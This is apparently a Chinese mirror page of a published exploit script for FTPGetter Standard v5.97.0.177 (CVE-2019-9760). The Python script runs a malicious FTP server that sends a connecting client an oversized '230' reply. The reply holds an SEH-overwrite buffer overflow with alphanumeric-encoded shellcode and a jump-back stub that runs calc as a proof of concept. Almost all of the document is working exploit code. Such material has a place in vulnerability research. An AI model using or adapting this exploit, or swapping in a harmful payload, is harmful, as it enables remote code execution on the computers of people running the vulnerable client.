扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 |
# Exploit Title: FTPGetter Standard - v.5.97.0.177 Remote Code Execution # Date: 05/03/2019 # Exploit Author: https://github.com/w4fz5uck5 | @w4fz5uck5 # Vendor Homepage: https://www.ftpgetter.com # Software Link: https://www.ftpgetter.com/ftpgetter_setup.exe # Version: v.5.97.0.177 # Tested on: Windows 7 x64 # CVE : CVE-2019-9760 import socket import struct import time import sys # badchars = ( # "\x59\x5a\x5b\x5c\x00\x0a\x0d\x20\x40\x1a\x80\x82\x83\x84\x85\x86\x87" # "\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b" # "\x9c\x9e\x9f\xc0\xc1" ..... #) # x86/alpha_mixed simple fixer -> bytes "\x89\xe3\xd9\xe1\xd9\x73\xf4" calc ="" calc += "\x54" # push esp calc += "\x58" # pop eax calc += "\x05\x43\x06\x00\x00"# add eax,0x643 calc += "\x50" # push eax calc += "\x5f"# pop edi calc += "\x25\x4A\x4D\x4E\x55" # zerout EAX calc += "\x25\x35\x32\x31\x2A"# zerout EAX calc += "\x04\xab" # ADD AL,0xab calc += "\x31\x07" # XOR DWORD PTR DS:[EDI],EAX calc += "\x31\x47\x01"# XOR DWORD PTR DS:[EDI+1],EAX calc += "\x31\x47\x02"# XOR DWORD PTR DS:[EDI+2],EAX calc += "\x2C\x5B" # SUB AL,0x5b -> EAX = 0x50 calc += "\x31\x47\x03" # XOR DWORD PTR DS:[EDI+3],EAX calc += "\x31\x47\x04" # XOR DWORD PTR DS:[EDI+4],EAX calc += "\x90\x90\x90\x90"# padding # "\x89\xe3" calc += "\x54"# push esp calc += "\x5b"# pop ebx # "\xd9\xe1\xd9" xored: 0xab calc += "\x72\x4a\x72" # \x73\xf4 xored: 0x50 calc += "\x23\xa4" calc += "\x58\x50\x59\x49\x49\x49" calc += "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33" calc += "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41" calc += "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41" calc += "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a" calc += "\x4a\x49\x58\x59\x48\x4b\x4f\x4e\x48\x39\x47\x53\x45" calc += "\x37\x56\x51\x38\x59\x32\x54\x51\x34\x5a\x54\x51\x4a" calc += "\x51\x39\x4f\x39\x58\x31\x45\x43\x56\x51\x53\x42\x35" calc += "\x49\x4b\x33\x48\x42\x55\x54\x45\x53\x43\x42\x45\x45" calc += "\x31\x4b\x58\x56\x50\x56\x4d\x33\x39\x59\x32\x51\x4a" calc += "\x5a\x32\x42\x4b\x31\x4d\x32\x43\x45\x4b\x32\x44\x4b" calc += "\x4e\x53\x4d\x31\x49\x50\x38\x59\x34\x4b\x55\x31\x49" calc += "\x30\x54\x51\x5a\x47\x55\x53\x57\x31\x4d\x54\x53\x4c" calc += "\x59\x4b\x49\x42\x49\x38\x4d\x4a\x5a\x37\x4f\x4a\x33" calc += "\x58\x34\x50\x4b\x4b\x51\x4b\x5a\x48\x4e\x4d\x42\x50" calc += "\x53\x4b\x46\x48\x4e\x53\x4b\x36\x35\x58\x42\x44\x4e" calc += "\x4c\x30\x52\x54\x4e\x4c\x4d\x59\x4d\x46\x4d\x37\x4c" calc += "\x37\x4c\x4f\x50\x4b\x4c\x4f\x4c\x4c\x42\x57\x53\x49" calc += "\x38\x58\x57\x4d\x44\x32\x4e\x57\x53\x38\x59\x5a\x43" calc += "\x33\x35\x49\x44\x43\x35\x4c\x32\x45\x4b\x5a\x49\x35" calc += "\x59\x51\x4a\x35\x4c\x50\x39\x4f\x4d\x41\x41" # Encode addresses and create jmp esp # Calculate jmp esp offset and put it on stack jump_back ="\x55" # push ebp jump_back += "\x58"# pop eax jump_back += "\x05\x2b\x08\x00\x00" # add eax,2091 jump_back += "\x50"# push eax # zerout EAX jump_back += "\x25\x4A\x4D\x4E\x55"# andeax, 0x554e4d4a jump_back += "\x25\x35\x32\x31\x2A" # andeax, 0x2a313235 jump_back += "\x3E\x33\x04\x24"# XOR EAX,DWORD PTR DS:[ESP] -> send stack addr to EAX jump_back += "\x50" # push eax jump_back += "\x5f"# pop edi # zerout EAX jump_back += "\x25\x4A\x4D\x4E\x55"# andeax, 0x554e4d4a jump_back += "\x25\x35\x32\x31\x2A" # andeax, 0x2a313235 jump_back += "\x04\x81"# ADD AL,0x81 jump_back += "\x31\x07"# XOR DWORD PTR DS:[EDI],EAX jump_back += "\x31\x47\x01" # XOR DWORD PTR DS:[EDI+1],EAX jump_back += "\x90\x90\x90\x90"# padding # Tool utilized: https://github.com/ihack4falafel/Slink # All rights reserved to ihack4falafel # # \x54\x58\x66\x05\x04\x06\x50\xc3 jump_back += "\x25\x4A\x4D\x4E\x55" # andeax, 0x554e4d4a jump_back += "\x25\x35\x32\x31\x2A"# andeax, 0x2a313235 jump_back += "\x05\x02\x03\x30\x62"# addeax, 0x62300302 jump_back += "\x05\x02\x03\x20\x61"# addeax, 0x61200302 jump_back += "\x50" # push eax jump_back += "\x25\x4A\x4D\x4E\x55"# andeax, 0x554e4d4a jump_back += "\x25\x35\x32\x31\x2A" # andeax, 0x2a313235 jump_back += "\x05\x32\x34\x33\x03" # addeax, 0x03333432 jump_back += "\x05\x22\x24\x33\x02" # addeax, 0x02332422 jump_back += "\x50"# push eax # jump to second shellcode jump_back += "\x7e\x65" # jmp esp xored: 0x81 # Overflow size 493 payload ="\x90" * 29 payload += calc# shellcode payload += "\x90" * (493 - len(payload))# padding payload += "\x7e\x06\x90\x90"# NSEH payload += "\x31\x20\x77\x00"# SEH -> POP ESI # POP EBX # RETN payload += "\x90\x90\x90\x90" payload += jump_back# jump to our calc payload += "\x90" * 700# Final padding try: host, port = "0.0.0.0", 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, int(port))) s.listen(5) print "[*] Listening server at port: {}".format(port) print "[*] Waiting for the client!.." except Exception as e: print "[-] Failed attempt to create bind socket!" sys.exit(0) try: conn, client = s.accept() conn.send("220 Welcome to server !\r\n") conn.recv(1024) print "[+] User started communication with server!" conn.send("331 anonymous OK!\r\n") conn.recv(1024) print "[+] Received anonymous user from the client!" print "[*] CALC shellcode Length: " + str(len(calc)) print "[*] Jump Back shellcode Length: " + str(len(jump_back)) print "[*] Payload final size: " + str(len(payload)) print "[!] Attempting to send payload!..." conn.send("230 " + payload + "\r\n") time.sleep(1) print "[+] You should have your poped calc!" conn.close() s.close() except: print "[-] Failed attempt to send payload!" sys.exit(0) |
体验盒子
